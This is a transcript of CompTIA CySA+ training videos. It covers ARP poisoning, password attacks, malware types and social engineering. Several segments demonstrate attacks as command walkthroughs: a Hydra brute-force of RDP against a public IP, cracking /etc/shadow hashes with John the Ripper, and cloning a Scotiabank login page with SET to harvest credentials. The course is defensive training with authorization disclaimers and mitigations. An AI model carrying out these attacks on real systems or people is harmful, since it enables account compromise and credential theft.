a result of the ARP cache poisoning attack. This is the MAC address of the Kali Linux attacker station. Notice
it ends with 10-ed. What that means is anything that this Windows 10 client does, let's say to go to the internet,
is first going to go through the attacker station. Because IP forwarding is enabled on the attacker station, it's
still going to get out to the internet responses are going to come back, virtually undetectable. The only
difference is that the attacker now has all the traffic funneling through that machine from this host. And so it
could easily be analyzed and tracked using different tools like Wireshark, and so on. Now what can be done
about this? Well, making sure that only allowed devices are connected to the network is one step.
In other words, maybe using network access control to authenticate devices before they're allowed on the
network in the first place. Turning off unused network jacks that connect to switch ports in the end is going to
be another important thing that could be done. Or notice here that the type here is set to dynamic. You can use
PowerShell for example, to add a static entry in the ARP cache. You are manually hard-wiring it. That would
be another option, of course we want to make sure that individual stations like Windows 10 machines are
protected as well. And we want to make sure that users aren't clicking on things they shouldn't click on, and so
on, to infect their machines, which could also change MAC addresses and so on.
After completing this video, you will be able to recognize how malicious users use a variety of password
attacks to compromise user accounts.
Objectives
recognize how malicious users use a variety of password attacks to compromise user accounts
[Video description begins] Topic title: Password Attacks. The presenter is Dan Lachance . [Video description
ends]
Usernames and passwords by far still constitute the most common type of user authentication. Two-factor
authentication has come a long way, such as sending a PIN to a user's smartphone as an SMS text message. So
you have to have the username, the password, and the phone to get the PIN. However, password attacks are
still prevalent and need to be protected against. Now there are brute force and dictionary attacks. And then
there are rainbow table attacks. All of which can compromise user account passwords, potentially. Brute force
and dictionary attacks are automated.
You're not going to have a malicious user manually trying passwords, at least not for too long, when there are
so many freely available tools that can automate that and make it happen very, very quickly. So essentially,
with a brute force and dictionary attack, we have automated tools that try many different username and
password combinations. Now how do they know which usernames and passwords to try? Well, there are word
list variations from various dictionary files that you can download on the Internet. Such as library files with
medical terms, or legal terms, or common events in history, common landmarks around the world, anything
that people might choose to use for a password. Now, rainbow tables essentially are precomputed password
hashes.
A hash is a unique value that results when you take some data, like a password, feed it into a hashing
algorithm. Think of a hashing algorithm as a one-way mathematical formula that results in a unique item, and
it can't be reverse-engineered. So what we have with rainbow tables are large collections of precomputed
password hashes. Now given access to a hashed password, attackers can compare them. Now, if you think
about a hashed password, some systems store user passwords, not in clear text, of course, hopefully, but rather
as a hash value. If you know the hashing algorithm that was used to generate that value, then you can compare
it against an existing password that you know and running a hash on it. If you get the same thing, you know the
password. Now lookup tables for password hashes are prevalent all over the place.
[Video description begins] A screenshot of the following web page is displayed: CrackStation. It includes a
table with three column headers: Hash, Type, and Result. There is one row entry. [Video description ends]
Here's an example, CrackStation.net, where you can enter a hash value and it will tell you the actual text string,
as we see down in the bottom-right here. So we've got a large hash value that I've pasted into a field. It knows
that the type of hashing was sha256. So SHA stands for Secure Hashing Algorithm, we see that in the bottom-
right. And I can see the resultant password, @lph4. Now notice it says, Enter up to 20 non-salted hash, what's
salting?
Salting is a concept and a technique used to secure password hashes by adding additional values that aren't
actually part of the password. And that can throw off tools like this, like lookup tables for password hashing.
You also have rainbow tables. Now rainbow tables also store hashed information that you use to compare
against hashes to try to figure what passwords have been used. Now MD5, or Message Digest 5, is another
common hashing algorithm. But it's older and it's not nearly as secure as SHA256. So MD5 password hashes,
even up to eight characters long, have been proven to be crackable easily in seconds using commonly available
tools. Now rainbow tables are similar to lookup tables. But what makes them different is that the entire
precomputed hashes aren't stored for every possible password variation. They use less space than a lookup
table. So let's say we've got a lot of precomputed hashes that start with the same prefix, in this example,
f3aa5600b. Well, instead of storing that over and over and over and over and over, it stores it only once. It's
kind of like how compression algorithms work to store a single reference to a repeated item in a file, to end up
using less space. So while a rainbow table ends up taking less space, it's a little bit slower to look something up
because of this. Now slower than a lookup table.
[Video description begins] Rainbow Tables - Free Downloads. A screenshot of the following website is open:
https://freerainbowtables.com. [Video description ends]
Now there are plenty of free downloads for rainbow tables, as seen here at the freerainbowtables.com web site.
Now you can download these, and notice that they are in the gigabytes, these are big files. And specifically,
these ones as listed at the top of the web page are designed for use with a specific cracking tool, so the
RainbowCrack improved tool, multi-threaded. They even aside from dealing with password hashes. You can
even refer to default password lists all over the Internet.
[Video description begins] A screenshot of a table is displayed. The table contains six columns and several
rows. [Video description ends]
Where you can get a vendor, a specific model, a firmware version number. And then the access type, whether
it's telnet access, SNMP, or HTTPS, whatever it is. And you get a default username and password. And this is
one of the reasons why it's so crucial that we not stay with default configurations. Because they're widely
available to anyone that cares to look them up. Finally, password managers have become more and more
popular. Because it's become very cumbersome to remember passwords for a multitude of different web sites
and services out on the Internet. So a password manager is an app that you can run on any type of device that
centrally and securely stores multiple passwords. So it's great because it combines security with convenience.
Now a password or a passphrase is needed to unlock the password manager app. And so you need to make sure
you make it that complex. Otherwise, if a malicious user managed to get into your password manager, well,
that's the holy grail. They would have access to all of your passwords for all of your apps. So password
managers are important, so you need to make sure you harden your device. Have a personal firewall installed,
up-to-date antivirus scanner. Don't click on links or file attachments in e-mails. Or if you're going to do it, be
very, very judicious about what you accept as being legitimate.
In this video, learn how to use the hydra tool to brute force a Windows RDP connection.
Objectives
[Video description begins] Topic title: Hydra Password Attack. The presenter is Dan Lachance . [Video
description ends]
RDP, the Remote Desktop protocol uses Port 3389 to allow remote GUI management of Windows hosts. Now
there are a lot of vulnerabilities associated with this. And the one that we're going focus on using the Hydra
tool is simply brute forcing passwords. So the last thing you want to do is expose port 33 denied directly to the
Internet for all of your hosts that are running Windows that you want remotely managed. So to get started here,
we should really mention the standard disclaimer, do not use these tools against systems that you don't own,
well that you don't have express written permission to attack. Otherwise, you could be doing something that is
illegal.
[Video description begins] The following window is open: dlachance@kali:~. The following prompt is
displayed: dlachance@kali:~$. [Video description ends]
So to get started here, I'm using Kali Linux where the Hydra tools already built in and available. So I'm going
to type in hydra-l and I'm going to use the administrator default windows account. And I'm going to use a -
capital P to specify a file that might contain passwords. Now actually let's back up here. I'm going to change
directory to USR, that's the Unix-shared resources/share and word lists.
In this folder if I do an ls we can see I've got a file called rockyou.txt. Now that file if I were to cat it isn't just a
very large file that contains all kinds of different types of passwords.
[Video description begins] He executes the following command: clear. No output displays and the prompt does
not change. He executes the following command: ls. The output displays the content of the directory. The
prompt does not change. [Video description ends]
So what I'm going to do is instruct the Hydra tool, the dash capital P parameter to point to this file, and it's
going to use all of these in addition to using the administrator password, I'm going to pass it on the command
line.
[Video description begins] He executes the following command: cat rockyou.txt. The output displays the
contents of the rockyou.txt file. The prompt does not change. [Video description ends]
So as you can see, there are a lot of entries in there. I'll press Ctrl+C to start that. Let's do this again, Hydra-l
login is administrator. -P, we'll use the rockyou.txt file and I want to connect to the RDP port on a host and I'll
specify a host here.
[Video description begins] He executes the following command: clear. No output displays and the prompt does
not change. [Video description ends]
Now I'm doing all this manually, of course there are ways to script this and automate it. I'm just going to pop in
the IP here of a server I know that is visible and that is running RDP.
[Video description begins] He executes the following command: hydra -l administrator -P rockyou.txt
rdp://18.205.159.117. The output displays that the target is successfully completed. The prompt does not
change. [Video description ends]
And we can see it is actually attacking that server on Port 3389. And we can see it has found that the
administrator login was successfully used in conjunction with this password shown here to connect over RDP
to that host. So we now have a username and password. We know the identity of the host. From a malicious
user standpoint, they now have a way in. So what do you do to mitigate against this? Well, one of the things
that you shouldn't be doing is exposing all of your servers directly, certainly not to the Internet for RDP. You
might want to make sure that's only available internally and requires VPN authentication before RDP's even an
option on the inside.
20. Video: John the Ripper (it_cscysa20_03_enus_20)
[Video description begins] Topic title: John the Ripper. The presenter is Dan Lachance . [Video description
ends]
John the Ripper is a tool that's been around for a while that allows the cracking of user passwords in a variety
of different ways. You could crack a password for example that might have been applied to a zip archive file.
Or you might be able to crack a password based on a password hash stored in a Linux system, which is exactly
what we're going to do.
[Video description begins] The following window is open: dlachance@kali:/. The following prompt is
displayed: root@kali:~#. [Video description ends]
So I'm using Kali Linux and I'm connected here as user root. And what I'm going to do for starters is add a new
user account here in Linux using the user add command, I'm going to create a user called cblackwell.
[Video description begins] He executes the following command: useradd cblackwell. No output returns and
the prompt does not change. [Video description ends]
And I'm going to use the password command psswd to set a password for user cblackwell type in the password
and I'll confirm it and it's done. It says was updated successfully. Now note if you're not logged in as user root,
you might need to prefix all of these commands with the sudo command to run them in elevated privileged
mode.
[Video description begins] He executes the following command: passwd cblackwell. The screen prompts for
the new password. The output displays that the password has been updated successfully. The prompt does not
change. [Video description ends]
Now if I were to, let's say run the tail command, show last few lines of a text file. Let's start by doing a tail of /
etc / password.
[Video description begins] He executes the following command: tail /etc/passwd. The output displays a list of
the system's accounts. The prompt does not change. [Video description ends]
We can see we've got users cblackwell listed here. So that account has been created but there's no password
reference here because the password by default is stored in /etc/shadow. And we can see here that we've got
user cblackwell and a hash for that person's password.
[Video description begins] He executes the following command: tail /etc/shadow. The output displays a list of
the system's accounts. The prompt does not change. [Video description ends]
And that's what we're interested in trying to crack. In this particular case using John the Ripper. John the
Ripper includes a command called unshadow where you can put together some credential files. You essentially
lump them into a single file that you use for the attack. So of course, never do this on a system that you don't
own or a system that you don't have express permission to use for this purpose. But here it is a system I own,
so there's no danger. So I'm going to use unshadow. I'm going to specify I want to lump together the
etc/passwd file and /etc/shadow. And let's say we'll output that using the output redirection symbol the greater
than sign to a file called creds.txt. Okay, so if I cat the creds.txt file.
[Video description begins] He executes the following command: unshadow /etc/passwd /etc/shadow >
creds.txt. No output returns and the prompt does not change. [Video description ends]
All right, looks like we've got the contents here including, of course the password hash information.
[Video description begins] He executes the following command: cat creds.txt. The output displays the content
of the creds.txt file. The prompt does not change. [Video description ends]
So looking good, so I'll clear the screen with the clear command. Now what I'm going to do is run the john
command, and I'm simply going to specify the name of the file the creds.txt file. And I'm going to press Enter,
and let it start doing its thing.
[Video description begins] He executes the following command: john creds.txt. The output displays the
password for the user cblackwell. The prompt does not change. [Video description ends]
And it doesn't take too long for it to determine that the password for user cblackwell, is green. So I'm going to
go ahead and press Ctrl+C. Now you can also, I'll just clear the screen, run the john command with -- show
after the fact, specify the file in this case creds.txt. To get a listing of all the passwords that it managed to
figure out, and here we just have one password hash that was cracked. In this case, it's the password for user
cblackwell.
[Video description begins] He executes the following command: john --show creds.txt. The output displays
that 1 password has been cracked. The prompt does not change. [Video description ends]
So we want to make sure that we limit access to a host in the first place naturally, this only succeeded because
I had access to some sensitive files on this host.
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course we've examined the execution of various types of malicious attacks, as well as some available
tools used as countermeasures to these attacks. We did this by exploring how reconnaissance is used to gather
information for hacking. How the Metasploit framework is used to generate e-mail lists. We talked about WiFi
vulnerabilities and attack techniques and tools to counter these attacks. We looked at injection, overflow, and
cross-site scripting attacks. We talked about XML attacks, common web application vulnerabilities, and the
OWASP ZAP tool. We looked at the slowhttptest command, and how session attacks are executed. We looked
at password attacks and the use of the Hydra password attack tool. And finally, we looked at how to crack user
passwords with the john the ripper tool. In our next course, we'll move on to explore how to protect users from
divulging sensitive information through social engineering scams, as well as protecting assets from various
types of malware.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. The host for this session is Dan Lachance. He is an
IT Trainer / Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held, and still hold, IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting,
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst, or CySA+
certification exam, is designed for IT professionals looking to gain security analyst skills to perform data
analysis, to identify vulnerabilities, threats and risks to an organization, to configure and use threat detection
tools, and secure and protect an organization's applications and systems.
In this course, we're going to explore asset protection from malware, and the protection of sensitive
information from users through social engineering scams. I'll start by examining different malware types, the
various forms of social engineering, and their related security risks. I'll then examine authentic email phishing
messages and show how to execute social engineering attacks using the Social Engineering Toolkit, otherwise
called SET. Next, I'll explore the danger of ransomware and how to mitigate this threat, how malware and
botnets have become black market commodities, and the proliferation of botnets under malicious user control.
I'll then demonstrate how to configure a reverse shell and use the Malzilla tool to explore malicious web pages.
Lastly, I'll explore a GUI malware dashboard and show how to configure malware settings on an endpoint
device.
[Video description begins] Topic title: Malware Types. The presenter is Dan Lachance. [Video description
ends]
Malware is malicious software. The scary thing about malware is that it doesn't require as much technical
expertise these days, to create it on malicious user's part, than it did in the past. In other words, there are plenty
of malware authoring tutorials and toolkits available on the Internet for anybody that's so inclined. Malware
infections begin with reconnaissance.
This is information gathering by attackers to seek out what might be a vulnerable system or doing a bit of
homework to see which users might be gullible and be easily fooled into clicking something in a phishing
email message. That type of thing. So it's about tricking people, that still remains the most serious IT security
threat. It's the people factor. People clicking on things that they shouldn't be clicking on or plugging in USB
thumb drives that might contain an infection, things of that nature. Now after a user is tricked in one way or
another to get the malware unleashed on a host or on a network, the malware will infect the device and could
even propagate itself over the network if it's a worm. After which, data might be stolen or, in the case of
ransomware, data might be encrypted. And a decryption key would not be made available unless the user pays
a ransom. And even if they do pay the ransom, there's never a guarantee that the key will be supplied anyways.
It could also result in deleted data or systems that are attacked and brought down. It could be anything.
A Trojan is a type of malware. You could think of it is being a wolf in sheep's clothing. What does that mean?
It means it's something that looks useful and benign. Such as, perhaps, getting a pop-up on your computer
when you're in your web browser surfing the Internet that states that there is a free tool that will scan your
machine for viruses. When in itself, it could be the virus, it could be the malware. So Trojans are often used to
deliver some other types of malware to a host or to a network. A virus needs to attach itself to specific files.
And so files could be of any type, whether it's an Office productivity file, like a spreadsheet, or a PowerPoint
template, or anything like that. It could also attach itself to an app installation file. So that when a user
downloads what appears to be useful software, in the form of a Trojan, the virus also gets installed. So the
Trojan serves as a delivery vehicle in that case.
A virus might also be part of, for example, a USB thumb drive. So removable media that gets triggered when
it's plugged into the machine, depending on how the machine is configured. Now, often, if you have people
downloading illegal copies of music or movies or TV shows, that type of media, actual playing entertainment
media, could also unleash a virus in the background. A worm doesn't need to be attached to a file like a
traditional virus does. And it can self-propagate over the network. And what it might do when it's self-
propagating is also have a component that scans the network from vulnerable hosts. Such as vulnerable file
sharing hosts that it could detect and then place itself into to further infect other devices. Ransomware, of
course, can either prevent system startup or encrypt user data files, and demands a payment to receive a
decryption key. We've mentioned that there's never a guarantee that one will receive the key even if the ransom
is paid. And it's usually some kind of anonymous payment cryptocurrency format like Bitcoin. So bear in mind
there's never a guarantee the keys will be provided. So you might pay a ransom and get nothing in return.
So what do we do to mitigate malware? Well, number one is user training and awareness. This goes very, very
far in helping the infection and the spread of infection from malware infected devices. Having up-to-date
antivirus signatures is always important. But modern malware doesn't have a specific signature, as was the case
years and years ago, at least not many of them. Instead, they morph themselves into some other format so they
evade detection through traditional signature-based comparisons. And so it's important to have an antivirus
tool, then, that has the ability to analyze behavior to determine if there's something fishy going on. An example
of this would be a piece of malware that might attach itself to the keyboard buffer in memory, so essentially a
keylogger, to read what people are typing in. Well, that's not normal outside of some applications that might
require to do that at the operating system level. And so that could trigger a warning or an alert to a user, or to a
central configuration tool, that there was suspicious activity and potentially malware has been detected.
In this video, you will learn how to identify the various forms of social engineering and the related security
risks.
Objectives
identify the various forms of social engineering and the related security risks
[Video description begins] Topic title: Social Engineering. The presenter is Dan Lachance. [Video description
ends]
There are a number of different types of attackers, including white hat hackers, grey hat, and black hat hackers.
Now their purpose is to improve security, but not exploit any weaknesses that get discovered. So it's about the
detection of vulnerabilities and then the reporting of those vulnerabilities to system owners. Now with white
hat hackers, the system owners aren't going to be surprised by this because they will have had a sense that this
activity was taking place. So for example, it could have been system owners that hired a penetration testing
team to do this. Although in this case, it's really more of a vulnerability assessment because weaknesses are not
being exploited as they would be with a true pen test.
Grey hat hackers don't have malicious intent. However, they still discover weaknesses and report them to
system owners. But this is without the permission of even scanning systems owned by these entities. And so
you could say that this is a violation of ethics and in some cases could be a violation of laws, which could
result in fines or imprisonment.
Black hat hackers are the bad guys or bad girls that have hacking skills. Their purpose, exploit discovered
weaknesses. Now why would this happen? Personal profit is a big motivation or ideological, or political
motivation, or simply to exude the power they have with their hacking skills and for bragging rights. So system
owners aren't notified of this type of attack. And of course, this type of activity can result in fines or
imprisonment.
Now, this leads us into social engineering, which is often a way that attackers can get into a network. Social
engineering is trickery or deception. Essentially, the goal is to get sensitive information disclosed from
unsuspecting victims in some way by somehow fooling them. Now there are many forms of this, many forms
of extortion, sextortion, and blackmail.
An example would be impersonating government departments. There are a lot of income tax scams where the
IRS in the United States or Canada Revenue Agency, CRA in Canada, there might be a phone call that an
individual receives. And apparently it's from CRA or the IRS, stating they have income taxes. All about they
need to pay right now, because a warrant has been issued for your arrest. It's a way to scare people, into
jumping into action without thinking clearly and scammers take advantage of this. Or it could be a phone call
or an email message for somebody impersonating law enforcement. So maybe trying to trick someone into
paying a fine immediately through a wire transfer. And of course, there's phishing with a ph not an f. Phishing
email messages are messages that are designed to try to trick people into somehow disclosing something
sensitive like credentials for a banking web site and so on.
[Video description begins] Social Engineering without Malware [Video description ends]
Now, social engineering is also possible without technology, without malware. Let's say that we've got a
malicious user that is impersonating a communications provider technician over the phone. So it's a phone call.
Maybe it's a phone call to the receptionist in the lobby of an organization saying that we've detected that you
have some problems with your phone system or Internet connectivity. We need to come in and take a look.
Now of course, again, the attacker ideally would have done some due diligence and some reconnaissance to
discover which communications provider company the victim organization is using. So then the attacker would
show up dressed appropriately in the right outfit. The victim, such as a front desk receptionist, might then
allow the attacker into a server room or a wiring closet because they are the communications tech. And then
the attacker would then have physical access to equipment. So things like storage arrays aren't locked up in a
rack in the server room, then the attacker potentially could physically steal drives. And, if those drives aren't
encrypted, have access to the data on the drives.
An example of a phishing email message would be something that looks legitimate. It looks like a real email
from a supplier or a business partner or even another colleague. So maybe it's an email that looks like a
legitimate message from my bank saying, "I should need to reset my password due to a recent outbreak in
malicious activity". The irony is not lost. So the victim will click the link and the link downloads and installs
malware. Or simply when the user clicks the link, they specify their username and password or their bank
account number and their password. And that gets sent out to malicious user, so it's possible.
[Video description begins] Phishing E-mail Message. A screenshot of a phishing e-mail is displayed. [Video
description ends]
An example of a phishing email message would be something that looks legitimate. It looks like a real email
from a supplier or a business partner or even another colleague. So maybe it's an email that looks like a
legitimate message from my bank saying, "I should need to reset my password due to a recent outbreak in
malicious activity". The irony is not lost. So the victim will click the link and the link downloads and installs
malware. Or simply when the user clicks the link, they specify their username and password, or their bank
account number and their password. And that gets sent out to malicious users, so it's possible.
[Video description begins] Social Engineering Mitigation Controls [Video description ends]
The other thing to bear in mind is that there are some mitigation controls. There are some countermeasures we
can put in place to reduce the impact or the probability of social engineering succeeding. There are
administrative controls such as user training and awareness. Take advantage of any time you might have with
standard user populations in the company, such as when onboarding new hires. Don't spend time talking about
things like they have to use strong passwords and so on. Because they're going to find that out on their own
when they go to reset a password. Instead, spend the time on making people actively aware about how often
these types of deceptive email messages come in to mailboxes. So people need to be trained. They need to
understand to be very judicious about anything they're going to click on. Basically, they need to be taught to be
cynical and suspicious all the time unfortunately. Security documentation needs to be accessible to users. It
needs to be convenient and easy because we will be updating security documentation as cybersecurity analysts
when incidents occur and new counter measures are put in place.
Periodic email reminders about security, not a bad idea. Security posters in the workplace, get creative, make it
fun, make it interesting, not boring. There needs to be a way, make people feel like they have ownership in it.
In other words, maybe convey to users that they need to essentially treat every single email message and all the
IT systems in the organization as if it were something that control their own bank account and credit cards.
Make them feel ownership about it. Now there are technical controls that can mitigate social engineering, such
as email spam filtering, having up-to-date anti-malware solutions on every device, including mobile devices
like smartphones. Having network firewall rules in place correctly, so they restrict everything other than
explicit items that are allowed only on an as-needed basis, it's a traffic in and out. Host firewall rules because
every device should have a personal firewall, even mobile devices. And also the proper configuration of
intrusion detection and prevention systems, which might be able to detect suspicious activity.
[Video description begins] Social Engineering Example [Video description ends]
So let's take a look at an example of social engineering. So let's say a user reads a malicious email message.
Now, of course, the user doesn't know it's malicious. It looks benign. Now, within the message, it's believable
so the user opens up a file attachment. Now, an attacker might do some recognizance, a bit of homework, and
see that a company might use, let's say company X as a supplier of office equipment. And so with that
knowledge, an attacker could put together an email message that looks convincing from the supplier saying
"hey, here's your latest invoice. It wasn't payed for the equipment you ordered". So that would be a way that a
user might actually be fooled into opening a file attachment, except in this case it's malicious. So let's say it's
ransomware that executes on the user device, and the user data files are then encrypted. So you usually can't
get to them unless they pay a ransom and hopefully receive decryption keys.
[Video description begins] Topic title: Social Engineering Examples. The presenter is Dan Lachance. [Video
description ends]
If you use email, and many people do, you've probably seen messages that looks similar to what I've got on the
screen here.
[Video description begins] An Outlook mailbox is open. An email is open. [Video description ends]
Apparently, this is an Amazon.com order confirmation, and it talks about how my account was used to buy a
250$ Gift Card. Okay, well, I've got a link here to Cancel The Order. However, when I hover over it, I can
kind of see in the bottom left that it's referencing something that says, korder.pw.
[Video description begins] In the email, he points to a button labeled "Cancel The Order". [Video description
ends]
That looks like a URL. That looks like it could be fishy. And as I go down through the message, I can see that
a $250 gift card for Amazon was sent to a specific Hotmail address. I have no idea who that is.
Although, when I look at that email address, I know something is definitely up. But I can also see here it says,
Please update your payment, we're having trouble with your billing.
[Video description begins] He highlights the email address of Netflix Support. [Video description ends]
Verify your account now. Now, when I hover over that link, in the bottom left, I can see it's referring to
something, and I just don't really know what that is.
[Video description begins] He points to a link labeled "Verify Account Now". [Video description ends]
[Video description begins] He clicks the Verify Account Now link. A web page labeled "Security error" opens.
It includes the text "Deceptive site ahead". [Video description ends]
Now, when I click it, this is what you get, Deceptive site ahead. Now this is an indication that your web
browser or your antivirus solution is actively checking that stuff out.
[Video description begins] He closes the Security error web page and switches to the email. [Video description
ends]
However, what you can also do, because you don't want to click on things and hope it gets caught, that is the
last thing that anybody should do.
[Video description begins] He right-clicks the Verify Account Now link and a shortcut menu opens. It includes
options labeled "Open link in new tab", "Copy link address", and "Open link in new window". [Video
description ends]
Instead, you can carefully right-click, copy the link address, and check it out.
[Video description begins] A web site labeled "kaspersky" opens. It includes tabs labeled "VirusDesk" and
"Application Advisor". The VirusDesk tab is selected. [Video description ends]
Now, when I say check it out, I mean go to some of the standard free tools that will scan a URL to see if it's
malicious. Here I've gone to virusdesk.kaspersky.com.
[Video description begins] He points to the URL in the address bar. [Video description ends]
And so I'm going to go ahead and put that URL link that I copied from that email, I'm going to click SCAN.
[Video description begins] In a text box, he pastes the URL "http://divindus-dmc.com/re". [Video description
ends]
Now we already know, it's not a good site to go to, because when I clicked on it, it looked like my web
browser caught it, which it did. It says, you risk losing your data by following this link. So we want to make
sure that this is the type of thing that users are aware of. What better way to communicate this than to have a
paid lunch and learn for users? And demonstrate this during the lunch and learn, how easy it is for this to
happen. Now, it's very hard to regain a reputation, if a company loses sensitive information or is hacked. It's
hard to gain those customers back to gain their trust and their loyalty. So it's very important that everyone in
the organization take ownership of the seriousness of these types of threats.
Find out how to use the Social Engineering Toolkit to carry out social engineering attacks.
Objectives
[Video description begins] Topic title: Social Engineering in Action. The presenter is Dan Lachance. [Video
description ends]
Social engineering is all about deception, tricking somebody into doing something they otherwise wouldn't do
or tricking them into divulging sensitive information, including banking information.
[Video description begins] A web site labeled "Scotiabank." opens. A sign in page is open. [Video description
ends]
That's our focus in this example. We're going to demonstrate how easy it can be to try to fool people into
providing sensitive banking information. So here in my web browser, I've navigated to the Scotiabank sign on
page for the Scotiabank web site. But it could be any bank, it doesn't make a difference. What I'm going to do
is copy that URL, because we're going to need it shortly.
Now that I've copied the URL, we're going to switch over to Kali Linux. Now the reason I copied that URL is
because we're going to tell Kali that we want to clone or copy that web site.
[Video description begins] The Terminal window opens. The following prompt is displayed:
root@kali:~#. [Video description ends]
Even though it's going to be under our control, it's going to look legitimate. That's where things start to get
really scary. So here in Kali Linux, I'm going to run the setoolkit. As you might guess, se in this case stands for
social engineering.
[Video description begins] He executes the following command: setoolkit. A menu page opens and the
following prompt is displayed: set>. The menu page includes some menus such as 1) Social-Engineering
Attacks and 2) Penetration Testing (Fast-Track). [Video description ends]
It's hard to believe that we have a menu system with a bunch of social engineering hacks, but it is what it is. So
I'm going to start with number 1, so Social-Engineering Attacks.
[Video description begins] He enters 1. Some menus are displayed such as 1) Spear-Phishing Attack Vectors
and 2) Website Attack Vectors. [Video description ends]
I'm looking at Website Attack Vectors in this case, so number 2. And I want to try to get people's banking
credentials.
[Video description begins] He enters 2. Some information and menus such as 1) Java Applet Attack Method, 2)
Metasploit Browser Exploit Method, and 3) Credential Harvester Attack Method are displayed. The following
prompt is displayed: set:webattack>. [Video description ends]
So I'm going to press 3, which takes me into Credential Harvester Attack Method. I want to harvest their
banking credentials.
[Video description begins] Some information and menus such as 1) Web Templates and 2) Site Cloner are
displayed. The following prompt is displayed: set:webattack>. [Video description ends]
Number 2, Site Cloner. Well, that's why I copied that Scotiabank URL initially.
[Video description begins] He enters 2. The Terminal window prompts: IP address for the POST back in
Harvester/Tabnabbing [192.168.4.52]:. [Video description ends]
First of all, we have to give it the IP address where we want results spit back to. And that, in this case, is going
to be the Kali Linux host that I am sitting at. And it already has the IP address for that in square brackets, I'm
just going to press Enter to accept it. Then I have to enter the URL to clone.
[Video description begins] The Terminal window prompts: Enter the url to clone:. [Video description ends]
So I've gone ahead and pasted in my Scotiabank authentication page, I'm just going to press Enter.
And essentially, it now tells me that the Credential Harvester is now running on port 80 on this IP address, so
the one listed up here for Kali Linux.
[Video description begins] In the previous prompt, he highlights the IP address: 192.168.4.52. [Video
description ends]
And that any information that is of any use is going to be displayed here on this screen. It'll generate report
after we exit out if we want to exit out of the Social-Engineering Toolkit. So this is interesting, what we need
to do then is somehow trick people into visiting this IP address. Of course, we could use a DNS name that
resolves to it. Okay, well that was easy.
[Video description begins] He switches to the Scotiabank web site. The sign in page is open. It includes text
boxes labeled "Username or Card number" and "Password" and a button labeled "Sign In". [Video
description ends]
I'm now in my browser connected to the IP address of Kali Linux where we've cloned the Scotiabank sign in
page.
[Video description begins] The address bar contains 192.168.4.52. He points to it. [Video description ends]
[Video description begins] In the Username and Card number text box, he enters a numeric value. [Video
description ends]
So if I start entering in a username or a card number and a password, so I'm going to put a password in here.
[Video description begins] In the Password text box, he enters the password. [Video description ends]
When I click Sign In, the user isn't informed that anything is wrong.
[Video description begins] He switches to the sign in page with the URL:
scotiaonline.scotiabank.com/online/authentication/authentication.bns. [Video description ends]
And as a matter of fact, it looks like they're redirected to the real thing. Looks like we've got a secured
connection, so the user won't even know anything happened.
[Video description begins] He clicks a lock icon adjacent to the address bar. A message box labeled
"Connection is secure" opens. [Video description ends]
But, what if we go back to Kali Linux and see what it's telling us?
[Video description begins] He switches to the Terminal window. [Video description ends]
Wow, I can see the userName and password are both specified here based on what the user entered into that
cloned fake Scotiabank web app.
[Video description begins] He highlights the username and password. [Video description ends]
Naturally, you don't want to do this for real against people without their explicit permission, in other words,
their knowledge of what you're doing. This is not something that is probably going to be looked upon
favorably, if you get caught doing it. So standard disclaimer, only use this in an environment where you
control everything or you have express written permission to do this type of thing. Now this is one of those
kinds of things that's very easy to do, it doesn't take a genius to make this happen.
And the other interesting thing about this is it's a great way to really bring the point home to end users with
training or training videos. So instead of spending time telling them about using complex passwords, because
they already didn't know they have to do that. They're just going to have to do, when they have to reset
passwords based on your password policies. But this type of thing is not so readily apparent. People need to be
aware of how easy it is for the bad guys to do this through social engineering.
After completing this video, you will be able to recognize the danger of ransomware and how to reduce this
threat.
Objectives
[Video description begins] Topic title: Ransomware. The presenter is Dan Lachance. [Video description ends]
Ransomware is a form of malware. And we've been hearing more and more about this in media reports over
the last few years, so it's quite prevalent. So this is often delivered through deception by tricking people, for
example, to click on a link in an email message or to open a file attachment. So one of the things that
ransomware can do is lock system startup. It can prevent a system from actually booting up. And instead, it
might display a message asking for the payment of ransom. Or it could encrypt data files, or could do both.
And in the same way, ask for a payment, usually through some anonymous mechanism like Bitcoin
cryptocurrency.
Now ransomware would begin with the user clicking a link or opening a file attachment in a malicious email
message. After which, the ransomware gets installed and executes on the device, and local files would get
encrypted. The other thing is that remote files might also get encrypted if the user is connected to a cloud
account and it has right access, depending on the ransomware variant, it very well could continue to write out
to those locations as well. So it's a serious issue. The other thing is that next, the user will get a message that a
ransom is being asked for in order to receive a decryption key, although there never is a guarantee that the
decryption key will be provided.
So, what can be done as a cybersecurity analyst to mitigate the impact of ransomware? Number one as always,
is user awareness of how easy it is for ransomware to infect a device. People need to be cynical and suspicious
about everything. On the technical side, we should have offline data backups. If we take periodic data backups,
that's a good thing. But if they're left online and a machine is infected, and that machine has write access to
that online backup, it can also encrypt the backup. We need to have up-to-date machine operating system
images. So in the event that we must respond to a ransomware incident, we have a quick way to get the
operating system back up and running. In other words, to adhere to the RTO, the Recovery Time Objective. So
the incident response plan is absolutely crucial when it comes to containing and dealing with ransomware
outbreaks.
[Video description begins] Commodity Malware [Video description ends]
Now, there's also commodity malware. What does that mean? It means that malware is sold as a commodity on
the dark web or the dark net. They're both the same thing, just depends what you want to refer to it as. There
are malware authoring kits for sale. There are botnets for rent. A botnet is a collection of infected devices
under singular malicious user control. And then there are also malware tutorials on how to create malware,
how to deliver malware, how to use the malware for personal gain, for example.
After completing this video, you will be able to recognize how malware and resultant botnets have become a
commodity for black markets.
Objectives
recognize how malware and resultant botnets have become a commodity for black markets
[Video description begins] Topic title: Commodity Malware. The presenter is Dan Lachance. [Video
description ends]
Commodity malware comes in many different forms. Such as in the form of ransomware, which when
infecting a machine can encrypt user data files. And require a ransom to be paid before producing a decryption
key to the user, if the key will be provided at all. There's distributed denial-of-service or DDoS type of
malware. Now a DDoS attack essentially means that we have a collection of computers that are instructed, for
example, to flood a victim network with useless traffic. Hence, denial-of-service. Distributed, because it's
multiple machines, essentially machines in a botnet. A botnet is a collection of infected machines under
singular hacker control. Those can be rented for any purpose. There's also ATM malware, where we talking
about bank machines. The ability for malware to disperse cash from a bank machine that otherwise should not
be dispersed.
